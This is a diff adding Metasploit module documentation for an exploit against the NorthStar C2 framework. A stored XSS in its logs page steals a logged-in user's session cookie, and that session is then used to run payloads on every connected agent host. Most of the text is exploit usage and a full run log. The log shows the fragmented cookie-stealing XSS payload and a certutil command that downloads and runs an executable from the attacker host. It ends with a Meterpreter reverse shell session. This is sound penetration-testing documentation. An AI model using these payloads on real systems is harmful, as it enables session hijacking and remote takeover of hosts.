|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +NorthStar C2, prior to commit `7674a44` on March 11 2024, contains a vulnerability where the logs page is |
| 4 | +vulnerable to a stored XSS. |
| 5 | +An unauthenticated user can simulate an agent registration to cause the XSS and take over a user's session. |
| 6 | +With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts |
| 7 | +(agents), and kill the original agent. |
| 8 | + |
| 9 | +Successfully tested against NorthStar C2 commit `e7fdce148b6a81516e8aa5e5e037acd082611f73` running on |
| 10 | +Ubuntu 22.04. The agent was running on Windows 10 19045. |
| 11 | + |
| 12 | +```mermaid |
| 13 | +flowchart TD |
| 14 | + A(fa:fa-computer Metasploit) |
| 15 | + B(fa:fa-server NorthStar C2) |
| 16 | + C(fa:fa-person Northstar C2 User) |
| 17 | + D(fa:fa-bug Agent) |
| 18 | + A -->|1. Upload XSS| B |
| 19 | + B -...-> C |
| 20 | + C -->|2. Visit XSS Page| B |
| 21 | + C -->|3. Send cookie| A |
| 22 | + A -->|4. Using Cookie, takeover agents| B |
| 23 | + D -->|5. Fetch and run payload, kill agent| A |
| 24 | + D -...-> B |
| 25 | + B -...-> D |
| 26 | +``` |
| 27 | + |
| 28 | +### Install NorthStar C2 |
| 29 | + |
| 30 | +Instructions for Ubuntu 22.04. Official documentation and manual installation steps can be found [here](https://github.com/EnginDemirbilek/NorthStarC2/wiki/Installation). |
| 31 | + |
| 32 | +``` |
| 33 | +sudo apt-get update |
| 34 | +sudo apt-get install -y software-properties-common git wget mysql-server |
| 35 | +sudo add-apt-repository ppa:ondrej/php |
| 36 | +sudo apt-get update |
| 37 | +sudo service mysql start |
| 38 | +git clone https://github.com/EnginDemirbilek/NorthStarC2.git |
| 39 | +cd NorthStarC2 |
| 40 | +git checkout e7fdce148b6a81516e8aa5e5e037acd082611f73 |
| 41 | +chmod +x install.sh |
| 42 | +sudo ./install.sh # mysql answers: root:<empty>, make sure to give a website username/password |
| 43 | +sudo apt-get purge -y php |
| 44 | +sudo apt autoremove -y |
| 45 | +sudo apt-get install -y php7.2 libapache2-mod-php7.2 php7.2-mysql |
| 46 | +sudo a2dismod php* |
| 47 | +sudo a2enmod php7.2 |
| 48 | +sudo service apache2 restart |
| 49 | +``` |
| 50 | + |
| 51 | +### Agent Install |
| 52 | + |
| 53 | +This should be done on a Windows computer: |
| 54 | + |
| 55 | +On the c2 payload, you'll want to edit `Program.cs` on line 13 and edit `mainUri` to your northstar IP. |
| 56 | +Now run the program, or compile and run it, and ensure the agent is active on the NorthStar C2 website. |
| 57 | + |
| 58 | +## Verification Steps |
| 59 | + |
| 60 | +1. Install the application, and connect an agent |
| 61 | +1. Start msfconsole |
| 62 | +1. Do: `use exploit/windows/http/northstar_c2_xss_to_agent_rce` |
| 63 | +1. Do: `set rhosts [ip]` |
| 64 | +1. Do: `set srvhost [srvhost]` |
| 65 | +1. Do: `set fetch_srvport [fetch_srvport]` |
| 66 | +1. Do: `set fetch_srvhost [fetch_srvhost]` |
| 67 | +1. Do: `run` |
| 68 | +1. Do: visit the NorthStarC2 site with a logged in user, and browse to the Server Logs page. |
| 69 | +1. You should get a shell on each agent. |
| 70 | + |
| 71 | +## Options |
| 72 | + |
| 73 | +### KILL |
| 74 | + |
| 75 | +If the NorthStarC2 agent should be explicitly killed on each compromised host. Defaults to `false` |
| 76 | + |
| 77 | +## Scenarios |
| 78 | + |
| 79 | +### NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 on Ubuntu 22.04 with an agent on Windows 10 |
| 80 | + |
| 81 | +``` |
| 82 | +resource (northstar.rq)> use exploit/windows/http/northstar_c2_xss_to_agent_rce |
| 83 | +[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp |
| 84 | +resource (northstar.rq)> set rhosts 4.4.4.4 |
| 85 | +rhosts => 4.4.4.4 |
| 86 | +resource (northstar.rq)> set srvhost 3.3.3.3 |
| 87 | +srvhost => 3.3.3.3 |
| 88 | +resource (northstar.rq)> set verbose true |
| 89 | +verbose => true |
| 90 | +resource (northstar.rq)> set FETCH_SRVPORT 9090 |
| 91 | +FETCH_SRVPORT => 9090 |
| 92 | +resource (northstar.rq)> set FETCH_srvhost 3.3.3.3 |
| 93 | +FETCH_srvhost => 3.3.3.3 |
| 94 | +msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > exploit |
| 95 | +[*] Command to run on remote host: certutil -urlcache -f http://3.3.3.3:9090/p3icRkNmQwbsIs7RYzV5sA %TEMP%\tKvCAnUBZgfn.exe & start /B %TEMP%\tKvCAnUBZgfn.exe |
| 96 | +[*] Exploit running as background job 0. |
| 97 | +[*] Exploit completed, but no session was created. |
| 98 | +msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > |
| 99 | +[*] Fetch handler listening on 3.3.3.3:9090 |
| 100 | +[*] HTTP server started |
| 101 | +[*] Adding resource /p3icRkNmQwbsIs7RYzV5sA |
| 102 | +[*] Started reverse TCP handler on 3.3.3.3:4444 |
| 103 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 104 | +[!] The service is running, but could not be validated. NorthStar Login page detected |
| 105 | +[*] Sending XSS |
| 106 | +[*] Sending: N*/</script><q |
| 107 | +[*] Sending: N*/i.src=u/*q |
| 108 | +[*] Sending: N*/new Image;/*q |
| 109 | +[*] Sending: N*/var i=/*q |
| 110 | +[*] Sending: N*/s+h+p+'/'+c;/*q |
| 111 | +[*] Sending: N*/var u=/*q |
| 112 | +[*] Sending: N*/'http://';/*q |
| 113 | +[*] Sending: N*/var s=/*q |
| 114 | +[*] Sending: N*/':8080';/*q |
| 115 | +[*] Sending: N*/var p=/*q |
| 116 | +[*] Sending: N*/a+b;/*q |
| 117 | +[*] Sending: N*/var h=/*q |
| 118 | +[*] Sending: N*/'.10.147';/*q |
| 119 | +[*] Sending: N*/var b=/*q |
| 120 | +[*] Sending: N*/'192.168';/*q |
| 121 | +[*] Sending: N*/var a=/*q |
| 122 | +[*] Sending: N*/d.cookie;/*q |
| 123 | +[*] Sending: N*/var c=/*q |
| 124 | +[*] Sending: N*/document;/*q |
| 125 | +[*] Sending: N*/var d=/*q |
| 126 | +[*] Sending: N</td><script>/*q |
| 127 | +[*] Waiting on XSS execution |
| 128 | +[*] Using URL: http://3.3.3.3:8080/ |
| 129 | +[*] Server started. |
| 130 | +``` |
| 131 | + |
| 132 | +Now visit the site with a logged in user, and browse to the Server Logs page. |
| 133 | + |
| 134 | +``` |
| 135 | +[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - Received GET request. |
| 136 | +[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - Received cookie: st0sfhqto9mqtpd81rlg6hq5g5 |
| 137 | +[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - Live Agents |
| 138 | +=========== |
| 139 | + ID IP OS Username Hostname Status |
| 140 | + -- -- -- -------- -------- ------ |
| 141 | + NC1S7X834eJVcJtynrq 222.222.22.222 Windows 10 Enterprise DESKTOP-Q0HUOEI\h00die DESKTOP-Q0HUOEI Online |
| 142 | +[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - CSRF Token: 38b4d324e8cd233b7a94c62e7b3c5556 |
| 143 | +[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Stealing DESKTOP-Q0HUOEI |
| 144 | +[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Enabling shell mode |
| 145 | +[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - Command sent successfully to agent NC1S7X834eJVcJtynrq, response: Cmd mode enabled, all commands will be redirect to CMD. Response delay is : 2000 miliseconds |
| 146 | +[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - (NC1S7X834eJVcJtynrq) Running payload |
| 147 | +[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA |
| 148 | +[*] Sending payload to 222.222.22.222 (Microsoft-CryptoAPI/10.0) |
| 149 | +[*] Client 222.222.22.222 requested /p3icRkNmQwbsIs7RYzV5sA |
| 150 | +[*] Sending payload to 222.222.22.222 (CertUtil URL Agent) |
| 151 | +[*] Sending stage (201798 bytes) to 222.222.22.222 |
| 152 | +[*] Meterpreter session 1 opened (3.3.3.3:4444 -> 222.222.22.222:50116) at 2024-04-10 14:40:31 +0000 |
| 153 | +msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > sessions -i 1 |
| 154 | +[*] Starting interaction with 1... |
| 155 | +meterpreter > sysinfo |
| 156 | +Computer : DESKTOP-Q0HUOEI |
| 157 | +OS : Windows 10 (10.0 Build 19045). |
| 158 | +Architecture : x64 |
| 159 | +System Language : en_US |
| 160 | +Domain : WORKGROUP |
| 161 | +Logged On Users : 2 |
| 162 | +Meterpreter : x64/window |
| 163 | +``` |
0 commit comments